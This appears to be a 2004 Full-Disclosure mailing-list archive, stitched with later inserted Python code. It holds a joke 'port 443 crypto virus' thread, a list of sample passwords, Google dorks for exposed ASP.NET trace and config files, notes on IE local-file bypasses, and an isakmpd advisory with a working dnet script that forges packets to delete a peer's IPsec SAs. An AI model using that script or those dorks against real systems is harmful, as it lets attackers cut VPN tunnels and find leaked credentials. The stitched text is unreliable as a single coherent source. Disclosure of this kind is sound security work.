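    if _normalize(http_body) == _normalize(https_body):
        return "expected"
    return "investigate"


def check_host(host: str) -> str:
    """Run both checks against a live host (needs network access)."""
    name = service_for_port(443) or "unlisted"
    _, plain = fetch(host, 80, use_tls=False)
    _, secure = fetch(host, 443, use_tls=True)
    verdict = classify_listener(plain, secure)
    return f"443/tcp is registered as {name!r}; listener on {host}:443 is {verdict}"


if __name__ == "__main__":
    import sys
    # Placeholder host; replace with the server that "accepts connections on 443".
    print(check_host(sys.argv[1] if len(sys.argv) > 1 else "www.example.com"))
```

A matching page only shows that 443 is the site's own TLS endpoint; if the bodies differ, the next step is to look at the certificate the listener presents and at what process owns the socket on the host, rather than at the captured (and, as Harlan notes, necessarily encrypted) traffic.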


Re[2]: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Thierry
Hello Listmembers,

A brief call to the list: Please don't feed the troll.
My mail threshold from this list has enough bs.

Thanks.
-- 
Best regards,
 Thierry  mailto:[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Steve Boone
How about renaming it to [EMAIL PROTECTED]  More fitting methinks.  :-)

-Original Message-
From: Billy B. Bilano
[mailto:[EMAIL PROTECTED] 
Sent: Tuesday, June 08, 2004 9:53 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


Salutations, amigos!

Bill Bilano here, reporting in from the front-lines! I've got some
disturbing news that I've got to get some answers about while I share. I
think we're about to come under full hacker attack at any second! And to
those people that said us folks talking about crypto viruses were being
chicken littles... let me tell you, the sky just fell! And it is HEAVY!

I was sitting at my desk doing more research on the OPENBSD virus I
discovered last week. I was watching ethereal and monitoring the traffic
coming in and out of the facility and I saw a ton of traffic coming straight
for our web servers! The routers, firewalls, and intrusion detraction
systems were not sounding the red alarms like they should have been (we'll
get to THAT one later).

There appears to be a new virus in town and it's affecting Windows and UNIX
web servers! I have not identified a pattern of infection yet but the virus
is clearly advancing but it only affects web servers!

The virus works on port 443. It seems to accept inbound connections on that
port as well and, presumably, awaits for commands from some series of
servers elsewhere. Perhaps taking orders? I also captured some of the
traffic and attempted to analyze it up but it looks like -- you heard it
here first, folks -- the payload is encrypted! Is this the first of a coming
storm of crypto viruses we've all been eagerly fearing? (I have already sent
a copy of the payload to the distributed.net people so they can try to use
some of those wasting cycles to decipher it like they did the last one!)

I have taken the liberty of naming the virus already. I looked in
etc/services and saw that this port is for and it is something called "ssl"
so I am calling it w32.ssl.b (b for bilano, since I discovered this wretched
thing!)

I called in our webmaster and showed him the data. He is either too stupid
to know what's going on or he takes me for a fool. I got him in the
conference room and showed him the print outs. He tried to convince me it
was not a virus and just normal web traffic but web traffic is on port 80!
No fooling old Bill! LOL! So I told him to gather his stuff up and gave him
his marching orders. I have no time for this kind of bull, what with the
OPENBSD virus last week (still picking up the pieces there). He must have
known I was on to him because he was just laughing on his way out the front
door. He may have even been involved with the infection! Good riddance,
chump!

At any rate, this is your heads up, folks! You heard it here first! Be on
the lookout for this first, very nasty CRYPTO VIRUS!

P.S. I wonder if this virus was from a spam-gang?!

P.P.S. Check out my bloglog in my sig!


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Jason Bethune
This is a hoax...check out his site he is known for things like this.

Jason Bethune

 

IT Specialist

Town of Kentville

354 Main Street

Kentville, NS 

B4N 1K6

 

www.town.kentville.ns.ca


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of James Bliss
Sent: Tuesday, June 08, 2004 2:46 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!

> Whatever ssl is, I don't know but it's using the so-called "ssl" port on
> the web servers. I don't think it has anything to do with whatever ssl
> was back in the old days of UNIX. It has a lower port number and that
> means it's an older port! Probably from the 1970s!
>
> Besides, why should I see any encrypted traffic on any port other than
> SSH? I don't expect to see encryption on anything other than the SSH
> port 22 (which is a very old port).

You are kidding, right?  SSL = Secured Sockets Layer.  It probably includes 
encryption.  It would not be too _SECURE_ if it was plain text.

SSH = Secured Shell

Notice the use of _SECURED_ in both their names?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Oliver Welter
hi Guys,
I'm new to the list, so hello first ;)
I really don't know if you are just kidding or if I misunderstood your 
post...
Port 443 is the SecureHTTP protocol (https) - so it is correct that it 
is bound to a webserver process and it is correct that SSL-encrypted 
traffic goes in and out - so what's the matter ?

Oliver
--
This message was digitally signed
oliwel's public key: http://www.oliwel.de/oliwel.crt
Base certificate: http://www.ldv.ei.tum.de/page72




Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread dila
j00 d0nt f00l u5

"Billy B. Bilano" <[EMAIL PROTECTED]> wrote:
>
>Salutations, amigos!
>
>Bill Bilano here, reporting in from the front-lines! I've got some
>disturbing news that I've got to get some answers about while I share. I
>think we're about to come under full hacker attack at any second! And to
>those people that said us folks talking about crypto viruses were being
>chicken littles... let me tell you, the sky just fell! And it is HEAVY!
>
>I was sitting at my desk doing more research on the OPENBSD virus I
>discovered last week. I was watching ethereal and monitoring the traffic
>coming in and out of the facility and I saw a ton of traffic coming straight
>for our web servers! The routers, firewalls, and intrusion detraction
>systems were not sounding the red alarms like they should have been (we'll
>get to THAT one later).
>
>There appears to be a new virus in town and it's affecting Windows and UNIX
>web servers! I have not identified a pattern of infection yet but the virus
>is clearly advancing but it only affects web servers!
>
>The virus works on port 443. It seems to accept inbound connections on that
>port as well and, presumably, awaits for commands from some series of
>servers elsewhere. Perhaps taking orders? I also captured some of the
>traffic and attempted to analyze it up but it looks like -- you heard it
>here first, folks -- the payload is encrypted! Is this the first of a coming
>storm of crypto viruses we've all been eagerly fearing? (I have already sent
>a copy of the payload to the distributed.net people so they can try to use
>some of those wasting cycles to decipher it like they did the last one!)
>
>I have taken the liberty of naming the virus already. I looked in
>etc/services and saw that this port is for and it is something called "ssl"
>so I am calling it w32.ssl.b (b for bilano, since I discovered this wretched
>thing!)
>
>I called in our webmaster and showed him the data. He is either too stupid
>to know what's going on or he takes me for a fool. I got him in the
>conference room and showed him the print outs. He tried to convince me it
>was not a virus and just normal web traffic but web traffic is on port 80!
>No fooling old Bill! LOL! So I told him to gather his stuff up and gave him
>his marching orders. I have no time for this kind of bull, what with the
>OPENBSD virus last week (still picking up the pieces there). He must have
>known I was on to him because he was just laughing on his way out the front
>door. He may have even been involved with the infection! Good riddance,
>chump!
>
>At any rate, this is your heads up, folks! You heard it here first! Be on
>the lookout for this first, very nasty CRYPTO VIRUS!
>
>P.S. I wonder if this virus was from a spam-gang?!
>
>P.P.S. Check out my bloglog in my sig!
>
>
>Mr. Billy B. Bilano, MSCE, CCNA
>
>Expert Sysadmin Since 2003!
>'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS
>
>
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Meeusen, Charles D
"Men like me, we need a room full of clues"

--Doug.

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] Behalf Of Harlan
Carvey
Sent: Tuesday, June 08, 2004 12:40 PM
To: [EMAIL PROTECTED]
Cc: Billy B. Bilano
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


Bill,

From your post, you don't seem to have a great deal of
detailed information to share about this issue...
 
> The virus works on port 443. 

Wouldn't it then be, by definition, a worm?

> It seems to accept inbound connections on that
> port as well and, presumably, awaits for commands
> from some series of
> servers elsewhere. Perhaps taking orders? 

What information do you have to support this
assumption?

> I also captured some of the
> traffic and attempted to analyze it up but it looks
> like -- you heard it
> here first, folks -- the payload is encrypted!

If this worm runs over SSL, as you say, then wouldn't
you expect it to be encrypted?  

> Is this the first of a coming
> storm of crypto viruses we've all been eagerly
> fearing? 

Is it?
http://www.us-cert.gov/current/current_activity.html#pct

http://www.cert.org/advisories/CA-2002-27.html

To be totally honest, Bill, I don't see a great deal
of information in your post that supports any of your
assertions/assumptions.  If this thing is spreading
the way you say it is, then it's a worm.  

Regardless, there isn't any information in your post
that clearly shows that this worm infects both Windows
and Unix hosts.  In fact, one thing that does seem
clear in your post is that you haven't collected any
information from the "infected" hosts, but rather all
you've got so far is network traffic via
Ethereal...and to be honest, any worm running over SSL
is going to be encrypted...
 
> At any rate, this is your heads up, folks! You heard
> it here first! Be on
> the lookout for this first, very nasty CRYPTO VIRUS!

Thanks.  Noted.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread KF (lists)
I really hope this guy is not THIS retarded...  he was certainly smart 
enough to leave the XSS enabled on his guest book (which of course he 
called a virus)...

6/8/04
Javascript hackers in my guestbook! GUESTBOOK UNDER SIEGE! I guess I 
upset somebody with my finding out about their silly port 443 virus! I 
have disabled javascript on the guessbook for the time being! No more 
javascript virus!

http://www.bilano.biz/passwords.html
some passwords so I don't forget:
network/server   password    system
---------------  ----------  --------------------------------------------------
192.168.0.0/24   lips        all servers have same password to make it easy
                             they are all in the same rack!
192.168.1.2/32   doodoo      border router
192.168.1.3/32   doodoo      border router failover
192.168.1.7/32   mormons     the server that the ceo runs for his church.
192.168.1.10/32  scatsun     e10k (solaris)
10.200.0.10      scatsun     el0k interface 2 (solaris root TELNET ONLY)
SQLserv1         nugg3tt3r   SQL sa password (i should not have this but DBA
                             don't know)
SQLserv2         laps1c1e    SQL sa passwd (thanks DSNIFF! LOL)
SQLserv3         jumpsh1p    sa password again... why does he change them on
                             each one?
openbsd          root        simple but easy to remember password!
openbsdcarp      root
openbsdapache    root        they don't know i have this installed...
ceolaptop        helloceo    vmware works great!
cfolaptop        hellocfo    vmware again
ctpdesktop       hellocto    vmware! open source rules!

-KF
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread VB
Surely this is a poor attempt at comedy.
fyi,
The Secure Sockets Layer (SSL) is a commonly-used protocol for managing the
security of a message transmission on the Internet. SSL has recently been
succeeded by Transport Layer Security (TLS), which is based on SSL. SSL uses
a program layer located between the Internet's Hypertext Transfer Protocol
(HTTP) and Transport Control Protocol (TCP) layers. SSL is included as part
of both the Microsoft and Netscape browsers and most Web server products.
Developed by Netscape, SSL also gained the support of Microsoft and other
Internet client/server developers as well and became the de facto standard
until evolving into Transport Layer Security. The "sockets" part of the term
refers to the sockets method of passing data back and forth between a client
and a server program in a network or between program layers in the same
computer. SSL uses the public-and-private key encryption system from RSA,
which also includes the use of a digital certificate.
TLS and SSL are an integral part of most Web browsers (clients) and Web
servers. If a Web site is on a server that supports SSL, SSL can be enabled
and specific Web pages can be identified as requiring SSL access. Any Web
server can be enabled by using Netscape's SSLRef program library which can
be downloaded for noncommercial use or licensed for commercial use.

TLS and SSL are not interoperable. However, a message sent with TLS can be
handled by a client that handles SSL but not TLS.


- Original Message - 
From: "Billy B. Bilano" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 1:05 PM
Subject: Re: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


> Hi Harlan! Thanks for your reply... hard to make heads or tails of what
> you are saying though...
>
> > Wouldn't it then be, by definition, a worm?
>
> A worm or whatever you want to call it, that's cool. I just thought
> "virus" sounds more alarming than worm! Everybody has had a worm or two,
> but a virus is a tough cookie to crack!
>
>
> > What information do you have to support this
> > assumption?
>
> Because it is attacking our web servers and it seems to have somehow
> gotten installed on our web servers at the same time! I don't know how it
> got in, but there is traffic going in and out of the servers on port 443
> with an encrypted payload! I don't know what is answering on port 443 on
> the web servers, but for the life of me I can't find anything on them that
> looks like it's a virus or a worm or a troglodite or anything!
>
>
> > If this worm runs over SSL, as you say, then wouldn't
> > you expect it to be encrypted?
>
> Whatever ssl is, I don't know but it's using the so-called "ssl" port on
> the web servers. I don't think it has anything to do with whatever ssl was
> back in the old days of UNIX. It has a lower port number and that means
> it's an older port! Probably from the 1970s!
>
> Besides, why should I see any encrypted traffic on any port other than
> SSH? I don't expect to see encryption on anything other than the SSH port
> 22 (which is a very old port).
>
>
> > Regardless, there isn't any information in your post
> > that clearly shows that this worm infects both Windows
> > and Unix hosts.  In fact, one thing that does seem
> > clear in your post is that you haven't collected any
> > information from the "infected" hosts, but rather all
> > you've got so far is network traffic via
> > Ethereal...and to be honest, any worm running over SSL
> > is going to be encrypted...
>
> But this port 443 is not SSH! Why should it be encrypted? And what is this
> "ssl" thing? I've been in IT for many years and I am now IT Director here
> at the bank... I would think that I would know what "ssl" would be. I
> don't think this worm has anything to do with whatever "ssl" is. Does
> anybody even still use ssl? That's probably why the hackers chose it.
>
>
> P.S. Check out my bloglog, Harlan!
>
> 
> Mr. Billy B. Bilano, MSCE, CCNA
> 
> Expert Sysadmin Since 2003!
> 'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] FYI Only - Interesting Dot Net configuration item

2004-06-08 Thread DAN MORRILL
Good Morning List
I've been running some tests on an ASP dot Net web technology system, and ran 
into some things that would be good FYI from a security perspective. Since 
this is still new technology in some respects, there are some configuration 
items that should be observed, or at least noted possibly as a policy item, 
but security folks should be looking for these items when they are testing a 
dot net system.

For interest's sake - go to google and run the following if you want more 
information on these files (or to observe folks that didn't do their 
security right, and to observe first hand the data that is given over. Again, 
as with all security, risk is defined by the organization; this may or may 
not be risky depending on your view point.)

allinurl: "trace.axd"
allinurl: "web.config"
allinurl: "aspx.cs" for C# source
allinurl: "aspx.vb" for VBS source

Trace dot axd is a tracing function that can be controlled in the web.config 
file. Default is to not release this data, but the developer can modify the 
web.config file to show all trace data to an outside client. This data 
includes cookie session data, and other data that could be useful for 
session hijacking, and determining the physical configuration of the web 
server, including physical and logical drive space. This runs in memory, and 
is purged on a FIFO basis, or when IIS is restarted.

The web.config file holds configuration data for dot net for the web server. 
It provides good configuration data about how the dot net environment is set up 
for the web server. It can also hold connection string information for 
connecting to database systems, other systems, and virtual directories if 
not using integrated security.

All source files (.CS or .VB) can provide information about how the web 
application is set up, what it imports, and in some cases hold connection 
string data for accounts on database backend systems. That data is included if 
not using the ODBC DSN system. (Although it could be there if any form of 
credentials are embedded anywhere in the source code for a web system.)

Just thought I would pass this along as I have not seen anything like this 
posted on the network at all. My suggestion based on this data is that all 
Dot Net code bases uploaded onto a production server be configured in such a 
way that these data points are not exposed to the public. Default is that 
these are protected system files, but a developer can change these bounds, 
and there should be a handshake between security and development for 
production or other internet exposed systems.

Hope this was interesting.
r/
Dan

Sometimes MSN E-mail will indicate that the message failed to be delivered. 
Please resend when you get those; it does not mean that the mail box is bad, 
merely that MSN mail is overworked at the time.

Otherwise, hope things are going well.
r/
Dan
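As an added example (not from Dan's post, and not tooling from any project he names), a small Python audit of the web.config settings he describes: whether trace.axd is served to remote clients, plus the related verbose-error and embedded-credential exposures. Both web.config samples are constructed for this example, and the ASP.NET 1.x-style appSettings connection string is an assumption about where such strings are kept.

```python
"""Added example: audit an ASP.NET web.config for the exposure points the
post describes (trace.axd reachable by remote clients, verbose error pages
and credentials embedded in configuration). Both sample configs are
constructed; in practice the input is the application's own web.config."""
import xml.etree.ElementTree as ET

# Constructed sample: a developer enabled tracing for everyone, switched
# custom errors off, and left a password in an ASP.NET 1.x style appSettings
# connection string.
WEAK_WEB_CONFIG = """<configuration>
  <appSettings>
    <add key="DbConnection"
         value="server=db01;database=orders;uid=webapp;pwd=ExamplePassw0rd" />
  </appSettings>
  <system.web>
    <trace enabled="true" localOnly="false" pageOutput="false" requestLimit="40" />
    <customErrors mode="Off" />
    <compilation debug="true" />
  </system.web>
</configuration>
"""

# Constructed sample: the same application with the settings a production
# server should carry (tracing off, errors hidden from remote clients,
# integrated security instead of an embedded password).
HARDENED_WEB_CONFIG = """<configuration>
  <appSettings>
    <add key="DbConnection"
         value="server=db01;database=orders;Integrated Security=SSPI" />
  </appSettings>
  <system.web>
    <trace enabled="false" localOnly="true" />
    <customErrors mode="RemoteOnly" defaultRedirect="error.htm" />
    <compilation debug="false" />
  </system.web>
</configuration>
"""


def _attr(elem, name, default):
    """Attribute value, normalised so "True" and "true" compare equal."""
    return elem.get(name, default).strip().lower()


def _child(parent, tag):
    """Direct child element with the given tag, or None."""
    return next((c for c in parent if c.tag == tag), None)


def audit_web_config(xml_text):
    """Return a list of (severity, message) findings for one web.config."""
    root = ET.fromstring(xml_text)
    findings = []
    sysweb = _child(root, "system.web")
    if sysweb is not None:
        trace = _child(sysweb, "trace")
        # trace.axd only answers when enabled="true"; localOnly defaults to
        # true, so remote exposure needs an explicit localOnly="false".
        if trace is not None and _attr(trace, "enabled", "false") == "true":
            if _attr(trace, "localOnly", "true") != "true":
                findings.append(("high", "trace.axd is served to remote clients "
                                 "(trace enabled=true, localOnly=false)"))
            else:
                findings.append(("info", "tracing enabled but limited to localhost"))
        errors = _child(sysweb, "customErrors")
        if errors is not None and _attr(errors, "mode", "remoteonly") == "off":
            findings.append(("medium", "customErrors mode=Off: stack traces and "
                             "source context reach remote clients"))
        comp = _child(sysweb, "compilation")
        if comp is not None and _attr(comp, "debug", "false") == "true":
            findings.append(("low", "compilation debug=true on a production server"))
    # Any <add key value> whose value carries a password is a credential that
    # a leaked web.config hands straight to whoever fetched it.
    for add in root.iter("add"):
        value = add.get("value", "").lower()
        if "pwd=" in value or "password=" in value:
            findings.append(("high", "key %r embeds a database password in its "
                             "connection string" % add.get("key")))
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_WEB_CONFIG), ("hardened", HARDENED_WEB_CONFIG)):
        results = audit_web_config(cfg)
        print("%s web.config: %d finding(s)" % (label, len(results)))
        for severity, message in results:
            print("  [%s] %s" % (severity, message))
```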


Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread William Warren
have you got any code or anything to substantiate this?  Your site is 
unreachable

Billy B. Bilano wrote:
Salutations, amigos!
Bill Bilano here, reporting in from the front-lines! I've got some
disturbing news that I've got to get some answers about while I share. I
think we're about to come under full hacker attack at any second! And to
those people that said us folks talking about crypto viruses were being
chicken littles... let me tell you, the sky just fell! And it is HEAVY!
I was sitting at my desk doing more research on the OPENBSD virus I
discovered last week. I was watching ethereal and monitoring the traffic
coming in and out of the facility and I saw a ton of traffic coming straight
for our web servers! The routers, firewalls, and intrusion detraction
systems were not sounding the red alarms like they should have been (we'll
get to THAT one later).
There appears to be a new virus in town and it's affecting Windows and UNIX
web servers! I have not identified a pattern of infection yet but the virus
is clearly advancing but it only affects web servers!
The virus works on port 443. It seems to accept inbound connections on that
port as well and, presumably, awaits for commands from some series of
servers elsewhere. Perhaps taking orders? I also captured some of the
traffic and attempted to analyze it up but it looks like -- you heard it
here first, folks -- the payload is encrypted! Is this the first of a coming
storm of crypto viruses we've all been eagerly fearing? (I have already sent
a copy of the payload to the distributed.net people so they can try to use
some of those wasting cycles to decipher it like they did the last one!)
I have taken the liberty of naming the virus already. I looked in
etc/services and saw that this port is for and it is something called "ssl"
so I am calling it w32.ssl.b (b for bilano, since I discovered this wretched
thing!)
I called in our webmaster and showed him the data. He is either too stupid
to know what's going on or he takes me for a fool. I got him in the
conference room and showed him the print outs. He tried to convince me it
was not a virus and just normal web traffic but web traffic is on port 80!
No fooling old Bill! LOL! So I told him to gather his stuff up and gave him
his marching orders. I have no time for this kind of bull, what with the
OPENBSD virus last week (still picking up the pieces there). He must have
known I was on to him because he was just laughing on his way out the front
door. He may have even been involved with the infection! Good riddance,
chump!
At any rate, this is your heads up, folks! You heard it here first! Be on
the lookout for this first, very nasty CRYPTO VIRUS!
P.S. I wonder if this virus was from a spam-gang?!
P.P.S. Check out my bloglog in my sig!

Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS
--
My "Foundation" verse:
Isa 54:17  No weapon that is formed against thee shall prosper; and 
every tongue that shall rise against thee in judgment thou shalt 
condemn. This is the heritage of the servants of the LORD, and their 
righteousness is of me, saith the LORD.



Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread James Bliss
> Whatever ssl is, I don't know but it's using the so-called "ssl" port on
> the web servers. I don't think it has anything to do with whatever ssl
> was back in the old days of UNIX. It has a lower port number and that
> means it's an older port! Probably from the 1970s!
>
> Besides, why should I see any encrypted traffic on any port other than
> SSH? I don't expect to see encryption on anything other than the SSH
> port 22 (which is a very old port).

You are kidding, right?  SSL = Secured Sockets Layer.  It probably includes 
encryption.  It would not be too _SECURE_ if it was plain text.

SSH = Secured Shell

Notice the use of _SECURED_ in both their names?



Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread William Warren
this is highly shortsighted..well maybe not..if you do not have any 
users who do not use https...:)

Billy B. Bilano wrote:
Steve,
Sorry to say but it is not! I checked my incoming traffic again this morning
and the attack on port 443 is still coming in full steam ahead! I don't know
what's going on, but I am about to block that port on my firewall. Some
nitwit (probably the idiot that was here before I became IT Director)
somehow, for some reason, deliberately opened port 443 on the firewalls!
I am beginning to think that this is the first wave of the new coming global
crypto-storm!

Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS

- Original Message - 
From: "-, Steve" <--->
To: "Billy B. Bilano" <[EMAIL PROTECTED]>
Sent: Tuesday, June 08, 2004 11:34 AM
Subject: RE: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!


Please tell me this is just a really bad joke?
-Original Message-
From: Billy B. Bilano
[mailto:[EMAIL PROTECTED]
Sent: Tuesday, June 08, 2004 10:53 AM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Possible First Crypto Virus Definitely
Discovered!
Salutations, amigos!

--
My "Foundation" verse:
Isa 54:17  No weapon that is formed against thee shall prosper; and 
every tongue that shall rise against thee in judgment thou shalt 
condemn. This is the heritage of the servants of the LORD, and their 
righteousness is of me, saith the LORD.



[Full-Disclosure] unauthorized deletion of IPsec SAs in isakmpd, still

2004-06-08 Thread Thomas Walpuski
1 Abstract

  For nearly 10 months a handful of OpenBSD developers have been trying to
  fix a plethora of payload handling flaws in isakmpd. On 2004/01/13 they
  released something like a final patch to a broader public. The patch
  protects against some specific attacks, but does not solve the
  problem. 

2 Description

  Unauthorized deletion of IPsec SAs is still possible using a delete
  payload piggybacked on an initiation of main mode.

  For more details trace message_recv() ff. with gdb during an attack.

3 Affected Systems

  All (recent) versions of isakmpd are affected. The attack has been
  successfully tested against the most recent CVS-version of isakmpd.

4 The Attack

  Here we go. There is an IPsec tunnel between sg-a and sg-b:

sg-a# cat /kern/ipsec | grep SPI
SPI = 97e49ca2, Destination = , Sproto = 50
SPI = 901e38d9, Destination = , Sproto = 50

  The attacker built some little script, because this time he wants to
  shoot down a bunch of IPsec SAs:

attacker# cat during_these_hostile_and_trying_times_and_what-not
#!/bin/sh
if [ ! $# -eq 3 ]; then
  echo "usage: $0   ";
  exit;
fi

src=$1; dst=$2
spi=`echo $3 | sed 's/\(..\)/x\1/g'`
cky_i=`dd if=/dev/urandom bs=8 count=1 2>/dev/null`

dnet hex \
  $cky_i \
  "\x00\x00\x00\x00\x00\x00\x00\x00" \
  "\x01\x10\x02\x00" \
  "\x00\x00\x00\x00" \
  "\x00\x00\x00\x58" \
"\x0c\x00\x00\x2c" \
"\x00\x00\x00\x01" \
"\x00\x00\x00\x01" \
  "\x00\x00\x00\x20" \
  "\x01\x01\x00\x01" \
  "\x00\x00\x00\x18" \
  "\x00\x01\x00\x00" \
  "\x80\x01\x00\x05" \
  "\x80\x02\x00\x02" \
  "\x80\x03\x00\x01" \
  "\x80\x04\x00\x02" \
"\x00\x00\x00\x10" \
"\x00\x00\x00\x01" \
"\x03\x04\x00\x01" \
$spi |
dnet udp sport 500 dport 500 |
dnet ip proto udp src $src dst $dst |
dnet send

  He fires up his script with appropriate parameters:

attacker# ./during_these_hostile_and_trying_times_and_what-not \
> sg-b sg-a 901e38d9

  And the victim's IPsec SAs _and_ policies fade away almost
  instantaneously:

sg-a# cat /kern/ipsec  
Hashmask: 31, policy entries: 0

5 Solution?

  There are no bug fixes, yet.

Thomas Walpuski



Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Nils Ketelsen
On Tue, Jun 08, 2004 at 11:46:22AM -0500, Billy B. Bilano wrote:

> Sorry to say but it is not! I checked my incoming traffic again this morning
> and the attack on port 443 is still coming in full steam ahead! I don't know
> what's going on, but I am about to block that port on my firewall. Some
> nitwit (probably the idiot that was here before I became IT Director)
> somehow, for some reason, deliberately opened port 443 on the firewalls!

Close them. If you do not know what you need them for it might be the best
alternative.

> I am beginning to think that this is the first wave of the new coming global
> crypto-storm!

It is not that new, as a matter of fact. It is specified and documented for
10 years. It is SSL and it is supposed to be in place on many webservers.

Could we now please stop this stupid discussion, as it is absolutely not
worth eating up more time.


Thanks,
  Nils
-- 
Are there actually emacs fitted kitchens yet?

[EMAIL PROTECTED] (Nico Hoffmann)
on the subject of "vi mugs" in de.alt.arnooo]



Re: [Full-Disclosure] Possible First Crypto Virus Definitely Discovered!

2004-06-08 Thread Billy B. Bilano
Hi Harlan! Thanks for your reply... hard to make heads or tails of what you
are saying though...

> Wouldn't it then be, by definition, a worm?

A worm or whatever you want to call it, that's cool. I just thought "virus"
sounds more alarming than worm! Everybody has had a worm or two, but a virus
is a tough cookie to crack!


> What information do you have to support this
> assumption?

Because it is attacking our web servers and it seems to have somehow gotten
installed on our web servers at the same time! I don't know how it got in,
but there is traffic going in and out of the servers on port 443 with an
encrypted payload! I don't know what is answering on port 443 on the web
servers, but for the life of me I can't find anything on them that looks
like it's a virus or a worm or a troglodite or anything!


> If this worm runs over SSL, as you say, then wouldn't
> you expect it to be encrypted?

Whatever ssl is, I don't know but it's using the so-called "ssl" port on the
web servers. I don't think it has anything to do with whatever ssl was back
in the old days of UNIX. It has a lower port number and that means it's an
older port! Probably from the 1970s!

Besides, why should I see any encrypted traffic on any port other than SSH?
I don't expect to see encryption on anything other than the SSH port 22
(which is a very old port).


> Regardless, there isn't any information in your post
> that clearly shows that this worm infects both Windows
> and Unix hosts.  In fact, one thing that does seem
> clear in your post is that you haven't collected any
> information from the "infected" hosts, but rather all
> you've got so far is network traffic via
> Ethereal...and to be honest, any worm running over SSL
> is going to be encrypted...

But this port 443 is not SSH! Why should it be encrypted? And what is this
"ssl" thing? I've been in IT for many years and I am now IT Director here at
the bank... I would think that I would know what "ssl" would be. I don't
think this worm has anything to do with whatever "ssl" is. Does anybody even
still use ssl? That's probably why the hackers chose it.


P.S. Check out my bloglog, Harlan!


Mr. Billy B. Bilano, MSCE, CCNA

Expert Sysadmin Since 2003!
'C:\WINDOWS, C:\WINDOWS\GO, C:\PC\CRAWL'  -- RMS




RE: [sb] RE: [Full-Disclosure] Internet explorer 6 execution of arbitrary code (An analysis of the 180 Solutions Trojan)

2004-06-08 Thread Jelmer
> Can you prove me wrong?

I'll give it a shot

Before SP1 you could simply load any local file into an iframe, then they
realized this is a security risk and they removed that ability in SP1.
There have been 5 issues found that circumvented this restriction (that I
know of)


1) Thor took a look at a prerelease SP1 and added his 2 cents

http://seclists.org/lists/bugtraq/2002/Sep/0090.html

One of the few times he was actually helpful.
It turned out that using a serverside redirect you could still access local
resources. This is very much like what you are seeing here.
Microsoft then proceeded to correct this.

2) Another issue popped up, this time by mindwarper

Load a file that does a redirect to a local resource in an iframe, reload/
refresh the contents and presto, you're in, it renders it.

3) the shell protocol allows access to local resources like this  Eiji James Yoshida found this

http://www.geocities.co.jp/SiliconValley/1667/advisory08e.html

4) Arman Nayyeri found that showHelp let you access local chm files

http://www.security-corporation.com/articles-20040103-003.html


5) what I describe in the analysis, it's exactly the same as 1) with one
distinction: it uses a URL: prefix, IE doesn't see a file, ms-its, res etc.
protocol so assumes it's ok, and lets it pass  


It's nothing like the refresh issue 2) (since there is no refresh)

Nor is it anything that roozbeh describes, nice it uses scripting, this is a
serverside redirect

However no it's not strange that you have this feeling of déjà vu, it's a
variation of Thor's find. Microsoft patched it, overlooked this variation,
the author of this Trojan caught it effectively making it a new thing (tm) 



Note I got this wrong in the analysis and will probably update it
As for Roozbeh Afrasiabi's posts just ignore them... really just do it


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of BoneMachine
Sent: Tuesday 8 June 2004 15:29
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: [sb] RE: [Full-Disclosure] Internet explorer 6 execution of
